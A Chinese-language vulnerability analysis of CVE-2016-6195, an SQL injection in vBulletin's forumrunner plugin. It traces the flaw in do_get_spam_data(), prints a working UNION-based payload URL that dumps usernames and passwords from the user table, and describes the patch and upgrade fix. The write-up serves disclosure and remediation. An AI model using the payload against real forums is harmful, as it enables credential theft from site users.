vBulletin /forumrunner/request.php SQL注入漏洞

Author: janes(知道创宇404安全实验室) Date: 2016-11-15 ## 漏洞概述 ### 漏洞简介 vBulletin 是一个商业论坛程序，使用PHP语言编写，有研究者发现VBulletin核心插件`forumrunner`存在SQL注入漏洞： [CVE-2016-6195](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6195). 插件`forumrunner`默认开启， 利用该漏洞，攻击者能够利用SQL注入漏洞脱库。 ### 漏洞影响 攻击者能够利用SQL注入漏洞脱库 ### 影响版本 3.6.x ～ 4.2.1 4.2.2 ～ 4.2.2 Patch Level 5 4.2.3 ～ 4.2.3 Patch Level 1 ## 漏洞分析 > 分析所用版本`4.2.1` 漏洞的本质是`forumrunner/includes/moderation.php`文件中， `do_get_spam_data()`函数()对参数`postids`和`threadid`过滤不严导致SQL注入漏洞， 核心代码如下： ```php function do_get_spam_data (){ global $vbulletin, $db, $vbphrase; $vbulletin->input->clean_array_gpc('r', array( 'threadid' => TYPE_STRING, 'postids' => TYPE_STRING, )); ... }else if ($vbulletin->GPC['postids'] != '') { $postids = $vbulletin->GPC['postids']; $posts = $db->query_read_slave(" SELECT post.postid, post.threadid, post.visible, post.title, post.userid, thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid FROM " . TABLE_PREFIX . "post AS post LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid) WHERE postid IN ($postids) "); ``` VBulletin程序中并不直接使用`$_GET`等全局变量获取输入数据，而是使用`clean_gpc()` 和 `clean_array_gpc()` 函数来过滤输入数据，而这两个函数并未对`STRING`类型做严格过滤，而传入的参数`postids`是作为`SRING`类型解析，参数`postids`随后拼接在`SQL`语句中进行查询，导致SQL注入漏洞。 寻找调用或包含`do_get_spam_data()`函数的代码，发现`forumrunner/support/common_methods.php` ```php 'get_spam_data' => array( 'include' => 'moderation.php', 'function' => 'do_get_spam_data', ), ``` 继续回溯，发现`forumrunner/request.php`文件包含`support/common_methods.php`. ```php ... $processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING)); if (!$processed['cmd']) { return; } ... require_once(MCWD . '/support/common_methods.php'); ... if (!isset($methods[$processed['cmd']])) { json_error(ERR_NO_PERMISSION); } if ($methods[$processed['cmd']]['include']) { require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']); } if (isset($_REQUEST['d'])) { error_reporting(E_ALL); } $out = call_user_func($methods[$processed['cmd']]['function']); ... ``` 上面代码中`process_input()`函数(forumrunner/support/utils.php), 会从`$_REQUEST`中取值，进行简单的类型转换，`STRING`类型则原样返回，根据上面代码，可以通过`$_REQUEST['cmd']`参数调用`get_spam_data()`函数， 进而调用`do_get_spam_data()`函数。设置`$_REQUEST['d']`参数将打开错误报告，有助于SQL注入，当然也可以不设置`$_REQUEST['d']`参数，这对触发SQL注入漏洞没有影响。剩下的就是使用`postids`参数构造SQL payload ### `postids`参数注入 payload: `forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+` 设置断点及变量取值,注入结果如下：    从图中可以看出SQL注入语句执行成功，`$post['title']`变量已经获取了用户名和密码，其中`forumid`设置为`1`, 保证下面代码不会进入`if`条件判断语句中。 ```php while ($post = $db->fetch_array($posts)) { $forumperms = fetch_permissions($post['forumid']); if ( !($forumperms & $vbulletin->bf_ugp_forumpermissions['canview']) OR !($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads']) OR (!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid']) ) { json_error(ERR_NO_PERMISSION); } ``` ## 补丁分析 `includes/general_vb.php`文件, `fr_clean_ids`函数对`id`类变量进行了整数转换，从而阻止SQL注入攻击。 ``` function fr_clean_ids($list = ”) { $arr = explode(‘,’,$list); $cleanarr = array_map(‘intval’,$arr); return implode(‘,’,$cleanarr); } ``` `forumrunner/include/moderation.php`文件, `do_get_spam_data`函数过滤`$postids`和`$threadid` 参数 ``` $vbulletin->GPC[‘postids’] = fr_clean_ids($vbulletin->GPC[‘postids’]); ... if ($vbulletin->GPC[‘threadid’] != ”) { $threadids = $vbulletin->GPC[‘threadid’]; $threadids = fr_clean_ids($threadids); ... ``` ## 修复方案 1. 直接更新补丁 [http://members.vbulletin.com/patches.php](http://members.vbulletin.com/patches.php) 2. 更新VBulletin程序版本(>4.2.3) ## reference [https://enumerated.wordpress.com/2016/07/11/1/](https://enumerated.wordpress.com/2016/07/11/1/) [http://blog.securelayer7.net/vbulletin-sql-injection-exploit-cve-2016-6195/](http://blog.securelayer7.net/vbulletin-sql-injection-exploit-cve-2016-6195/)